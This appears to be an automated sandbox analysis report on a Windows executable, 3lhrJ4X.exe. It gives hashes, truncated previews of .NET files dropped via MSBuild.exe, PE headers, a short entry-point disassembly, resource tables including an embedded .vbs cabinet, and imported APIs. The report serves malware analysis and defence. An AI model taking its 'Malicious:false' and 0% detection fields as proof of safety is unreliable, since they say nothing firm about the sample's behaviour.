                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):298
                                                                                                                    Entropy (8bit):4.924206445966445
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:zx3M1tFAbQtASR30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13P30ZMt9BFN+QdCT2UftCM+
                                                                                                                    MD5:932782CF70ED00D22C0B08B5027B4E31
                                                                                                                    SHA1:78F460A2155D9E819B8452C281285D7E0A7AC14F
                                                                                                                    SHA-256:F2C2477FB3FD0A30F3D3D8637EF9C774B43E940043635DF90CDD804799A2ECE7
                                                                                                                    SHA-512:C83E72797C03CABCAB066B95BAEEBB13944143846794061CF9482EA3B283979E470930047FDAE72A6F06F51F3127FF39DAAEFAAD7557E3AD49F590B9E7B78D24
                                                                                                                    Malicious:false
                                                                                                                    Preview:Microsoft (R) Build Engine version 4.8.4084.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...
                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                    Entropy (8bit):6.853882776393411
                                                                                                                    TrID:
                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:3lhrJ4X.exe
                                                                                                                    File size:163'840 bytes
                                                                                                                    MD5:21b5e69aec540eaace5aa6d588896218
                                                                                                                    SHA1:fcd64b005a42f69bfa94118b0cc92d0ddf06ca29
                                                                                                                    SHA256:fcbd0c268f201e76e18eebce0bbc6b063bc2fda1dcf4511c19fdc1287a73195e
                                                                                                                    SHA512:560e4167d0699f22b71299442ed8051290fcae658e6e8eb1b46752239a9dc88c6ea8990a0fb43bb5db99d5afba65939788581c48e92e049fb704437c46d3126a
                                                                                                                    SSDEEP:3072:PahKyd2n31J5GWp1icKAArDZz4N9GhbkrNEk1BDxT:PahOlp0yN90QEi1
                                                                                                                    TLSH:DDF38D4A63E420A6E4BA57B199F203935A31BCB15B7486FF12C4D57E1E336C0A632F17
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                                                                                    Icon Hash:3b6120282c4c5a1f
                                                                                                                    Entrypoint:0x140008200
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x140000000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:10
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:10
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:10
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                                                                                                                    Instruction
                                                                                                                    dec eax
                                                                                                                    sub esp, 28h
                                                                                                                    call 00007F2460E196A0h
                                                                                                                    dec eax
                                                                                                                    add esp, 28h
                                                                                                                    jmp 00007F2460E18F4Bh
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    dec eax
                                                                                                                    mov dword ptr [esp+08h], ebx
                                                                                                                    dec eax
                                                                                                                    mov dword ptr [esp+10h], edi
                                                                                                                    inc ecx
                                                                                                                    push esi
                                                                                                                    dec eax
                                                                                                                    sub esp, 000000B0h
                                                                                                                    and dword ptr [esp+20h], 00000000h
                                                                                                                    dec eax
                                                                                                                    lea ecx, dword ptr [esp+40h]
                                                                                                                    call dword ptr [000011CDh]
                                                                                                                    nop
                                                                                                                    dec eax
                                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                                    dec eax
                                                                                                                    mov ebx, dword ptr [eax+08h]
                                                                                                                    xor edi, edi
                                                                                                                    xor eax, eax
                                                                                                                    dec eax
                                                                                                                    cmpxchg dword ptr [00004922h], ebx
                                                                                                                    je 00007F2460E18F4Ch
                                                                                                                    dec eax
                                                                                                                    cmp eax, ebx
                                                                                                                    jne 00007F2460E18F5Ch
                                                                                                                    mov edi, 00000001h
                                                                                                                    mov eax, dword ptr [00004918h]
                                                                                                                    cmp eax, 01h
                                                                                                                    jne 00007F2460E18F59h
                                                                                                                    lea ecx, dword ptr [eax+1Eh]
                                                                                                                    call 00007F2460E19533h
                                                                                                                    jmp 00007F2460E18FBCh
                                                                                                                    mov ecx, 000003E8h
                                                                                                                    call dword ptr [0000117Eh]
                                                                                                                    jmp 00007F2460E18F09h
                                                                                                                    mov eax, dword ptr [000048F6h]
                                                                                                                    test eax, eax
                                                                                                                    jne 00007F2460E18F9Bh
                                                                                                                    mov dword ptr [000048E8h], 00000001h
                                                                                                                    dec esp
                                                                                                                    lea esi, dword ptr [000013E9h]
                                                                                                                    dec eax
                                                                                                                    lea ebx, dword ptr [000013CAh]
                                                                                                                    dec eax
                                                                                                                    mov dword ptr [esp+30h], ebx
                                                                                                                    mov dword ptr [esp+24h], eax
                                                                                                                    dec ecx
                                                                                                                    cmp ebx, esi
                                                                                                                    jnc 00007F2460E18F67h
                                                                                                                    test eax, eax
                                                                                                                    jne 00007F2460E18F67h
                                                                                                                    dec eax
                                                                                                                    cmp dword ptr [ebx], 00000000h
                                                                                                                    je 00007F2460E18F52h
                                                                                                                    dec eax
                                                                                                                    mov eax, dword ptr [ebx]
                                                                                                                    dec eax
                                                                                                                    mov ecx, dword ptr [00001388h]
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1cf6c.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000x20.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0xf0000x1d0000x1d000ddf742af30579b8e4e407c8dcd40d0dbFalse0.741278286637931data7.050560118301305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x2c0000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                                                    RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                                                    RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                                                    RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                                                    RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                                    RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                                                    RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                                                    RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                                                    RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                                                    RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                                                    RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                                                    RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                                                    RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                                                    RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                                                    RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                                                                                                                    RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                                                                                                                    RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                                                                                                                    RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                                                                                                                    RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                                                                                                                    RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                                                                                                                    RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                                                                    RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                                                                                                                    RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                                                                                                                    RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                                                                                                                    RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                                                                                                                    RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                                                                                                                    RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                    RT_RCDATA0x298700x19ceMicrosoft Cabinet archive data, Windows 2000/XP setup, 6606 bytes, 1 file, at 0x2c +A "67784c48226c6.vbs", ID 1163, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.001665152891311
                                                                                                                    RT_RCDATA0x2b2400x4dataEnglishUnited States3.0
                                                                                                                    RT_RCDATA0x2b2440x24GLS_BINARY_LSB_FIRSTEnglishUnited States0.6388888888888888
                                                                                                                    RT_RCDATA0x2b2680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                    RT_RCDATA0x2b2700x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                    RT_RCDATA0x2b2780x4dataEnglishUnited States3.0
                                                                                                                    RT_RCDATA0x2b27c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                    RT_RCDATA0x2b2840x4dataEnglishUnited States3.0
                                                                                                                    RT_RCDATA0x2b2880x1dASCII text, with no line terminatorsEnglishUnited States1.2758620689655173
                                                                                                                    RT_RCDATA0x2b2a80x4dataEnglishUnited States3.0
                                                                                                                    RT_RCDATA0x2b2ac0x4dataEnglishUnited States3.0
                                                                                                                    RT_RCDATA0x2b2b00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                    RT_RCDATA0x2b2b80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                    RT_GROUP_ICON0x2b2c00xbcdataEnglishUnited States0.6117021276595744
                                                                                                                    RT_VERSION0x2b37c0x408dataEnglishUnited States0.42151162790697677
                                                                                                                    RT_MANIFEST0x2b7840x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906
                                                                                                                    DLLImport
                                                                                                                    ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                    KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                                                                    GDI32.dllGetDeviceCaps
